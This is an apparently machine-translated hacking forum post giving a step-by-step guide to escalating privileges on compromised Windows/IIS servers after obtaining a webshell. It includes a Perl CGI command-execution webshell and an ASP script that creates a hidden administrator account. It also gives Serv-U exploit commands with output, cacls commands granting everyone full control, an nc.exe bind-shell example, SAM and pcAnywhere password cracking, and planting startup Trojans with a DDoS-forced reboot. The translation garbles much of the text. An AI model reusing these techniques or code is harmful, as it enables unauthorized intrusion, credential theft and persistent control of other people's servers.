Ultimate permission improvement skills

This article Article Combined with the skills of many experts to improve permissions and some of their own ideas

When we get a webshell, the next step is to improve the permissions.

My personal summary is as follows:

1: C: \ Documents ents and Settings \ All Users \ Application Data \ symantec \ pcAnywhere \

Check whether you can jump to this directory. If you want to do so, just download its CIF file, get the pcAnywhere password, and log on to it.

PS: the cracking tool is provided on this site. Search by yourself!

2. c: \ winnt \ system32 \ config \

Enter its Sam here to crack the user's password.

The software used to crack the Sam password is LC, saminside.

3. c: \ Documents ents and Settings \ All Users \ Start Menu \Program\

No, we can get a lot of useful information from here.

We can see a lot of shortcuts. We generally choose Serv-U, and then check the local properties. After knowing the path, we can see whether the page can jump.

After entering, if you have the permission to modify servudaemon. ini and add a user, the password is blank.

[User = wekwen | 1]

Password =

Homedir = c :\

Timeout = 600

Maintenance = System

Access1 = C :\| rwamelcdp

Access1 = D :\| rwamelcdp

Access1 = f :\| rwamelcdp

Skeyvalues =

This user has the highest permission, and then we can go to quote site exec xxx over FTP to improve the permission.

4. c: \ winnt \ system32 \ inetsrv \ data \

This directory is also fully controlled by erveryone. All we need to do is upload the tool for permission escalation and then execute

5. Check whether you can jump to the following directory.

C: \ PHP, with phpspy

C: \ prel. Sometimes it is not necessarily this directory (you can also view the attributes by downloading the shortcut ).

#! /Usr/bin/perl

Binmode (stdout );

Syswrite (stdout, "Content-Type: text/html \ r \ n", 27 );

$ _ = $ ENV {QUERY_STRING };

S/% 20 // ig;

S/% 2f // ig;

$ Execthis = $ _;

Syswrite (stdout, "<HTML> <PRE> \ r \ n", 13 );

Open (stderr, "> & stdout") | die "can't redirect stderr ";

System ($ execthis );

Syswrite (stdout, "\ r \ n </PRE>
Close (stderr );

Close (stdout );

Exit;

Save as CGI for execution,

If not, try PL extension. Change the CGI file to the pl file and submit HTTP: // anyhost // cmd. pl? Dir

"Access Denied" is displayed, indicating that access is allowed! Submit now: Upload su.exe (Ser-u permission escalation tool) to the prel bin directory.

Http: // anyhost // cmd. pl? C \ Perl \ bin \ su.exe

Return Value:

Serv-U> 3.x Local Exploit by Xiaolu

Usage: serv-u.exe "command"

Example: serv-u.exe "nc.exe-l-P 99-e cmd.exe"

Now it is IUSR permission, submit:

Http: // anyhost // cmd. pl? C \ Perl \ bin \ su.exe "cacls.exe C:/e/T/g everyone: F"

Http: // anyhost // cmd. pl? C \ Perl \ bin \ su.exe "cacls.exe D:/e/T/g everyone: F"

Http: // anyhost // cmd. pl? C \ Perl \ bin \ su.exe "cacls.exe E:/e/T/g everyone: F"

Http: // anyhost // cmd. pl? C \ Perl \ bin \ su.exe "cacls.exe F:/e/T/g everyone: F"

If the following information is returned, the operation is successful.

Serv-U> 3.x Local Exploit by Xiaolu

<220 Serv-u ftp server v5.2 for Winsock ready...

> User localadministrator

<331 user name Okay, need password.

**************************************** **************

> Pass # l @ $ AK #. lk; 0 @ P

<230 user logged in, proceed.

**************************************** **************

> Site maintenance

**************************************** **************

[+] Creating new domain...

<200-domainid = 2

<220 domain settings saved

**************************************** **************

[+] Domain XL: 2 created

[+] Creating edevil user

& Lt; 200-user = XL

200 user settings saved

**************************************** **************

[+] Now exploiting...

> User XL

<331 user name Okay, need password.

**************************************** **************

& Gt; pass 111111

<230 user logged in, proceed.

**************************************** **************

[+] Now executing: cacls.exe C:/e/T/g everyone: F

& Lt; 220 domain deleted

In this way, all partitions are fully controlled by everyone.

Now we promote our users to administrators:

Http: // anyhost // cmd. pl? C \ Perl \ bin \ su.exe "net localgroup administrators iusr_anyhost/Add"

6. you can run "cscript c: \ Inetpub \ adminscripts \ adsutil. vbs get w3svc/inprocessisapiapps "to improve permissions
use this cscript C: \ Inetpub \ adminscripts \ adsutil. vbs get w3svc/inprocessisapiapps
View the privileged DLL file: idq. DLL httpext. DLL httpodbc. DLL ssinc. DLL msw3prt. DLL
. DLL to a privileged user
Asp. DLL is stored in c: \ winnt \ system32 \ inetsrv \ ASP. DLL (different locations may not be the same)
now we add cscript adsutil. vbs set/w3svc/inprocessisapiapps "C: \ winnt \ system32 \ idq. DLL "" C: \ winnt \ system32 \ inetsrv \ httpext. DLL "" C: \ winnt \ system32 \ inetsrv \ httpodbc. DLL "" C: \ winnt \ system32 \ inetsrv \ ssinc. DLL "" C: \ winnt \ system32 \ msw3prt. DLL "" C: \ winnt \ system32 \ inetsrv \ ASP. DLL "
you can use cscript adsutil. vbs get/w3svc/inprocessisapiapps to check if they are added.

7. you can also use this Code to try to upgrade the SDK, it seems that the effect is not obvious
<% @ codePage = 936%> <% response. expires = 0
on error resume next
session. timeout = 50
server. scripttimeout = 3000
set Lp = server. createobject ("wscript. network ")
Oz =" winnt: // "& LP. computername
set Ob = GetObject (OZ)
set OE = GetObject (OZ & "/administrators, group ")
set OD = ob. create ("user", "Wekwen $")
OD. setpassword "wekwen" <----- password
OD. setinfo
set of = GetObject (OZ & "/wekwen $, user")
Oe. add (. adspath)
response. write "wekwen $ super Account Created successfully! "%>

Use this code to check whether the upgrade is successful

<% @ CodePage = 936%>

<% Response. expires = 0

On Error resume next 'Find the account in the Administrators group

Set Tn = server. Createobject ("wscript. Network ")

Set objgroup = GetObject ("winnt: //" & tn. computername & "/administrators, group ")

For each admin in objgroup. Members

Response. Write Admin. Name & "<br>"

Next

If err then

Response. Write "No: wscript. Network"

End if

%>

8. c: \ Program Files \ Java Web Start \

If you can, it is usually very small, you can try to use JSP webshell. I heard that the permission is very small and I have never met.

9. finally, if the host settings are abnormal, try writing bat, vbs, and other Trojans in the C: \ Documents ents and Settings \ All Users \ "start" Menu \ Program \ Start.

Wait until the host is restarted or DDoS forces it to restart to improve the permission.

To sum up, find the directory for execution and writing, manage its directory, upload the lifting tool, and finally execute the command. The three words "find" on "" execute"

The above is my comments. Do you have any good methods to share them?

Xiaohui

04.12.12